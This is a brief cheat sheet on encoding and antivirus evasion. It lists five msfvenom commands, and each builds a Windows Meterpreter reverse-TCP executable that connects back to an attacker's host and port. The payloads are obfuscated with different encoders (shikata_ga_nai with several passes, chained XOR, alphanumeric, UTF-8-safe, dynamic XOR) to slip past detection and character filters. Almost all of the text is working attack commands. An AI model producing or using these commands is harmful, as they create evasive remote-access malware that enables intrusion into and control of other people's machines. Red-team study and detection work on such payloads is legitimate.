Encoding & Evasion

shikata_ga_nai — polymorphic XOR (most common)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe

Chained encoding (multiple passes)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/shikata_ga_nai -i 3 -e x86/call4_dword_xor -i 2 -f exe > chained.exe

Alpha-numeric — bypasses character filters

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/alpha_mixed -f exe > alpha.exe

Avoid UTF-8 tolower transforms

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/avoid_utf8_tolower -f exe > utf8safe.exe

Dynamic XOR key

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -e x86/xor_dynamic -f exe > xor.exe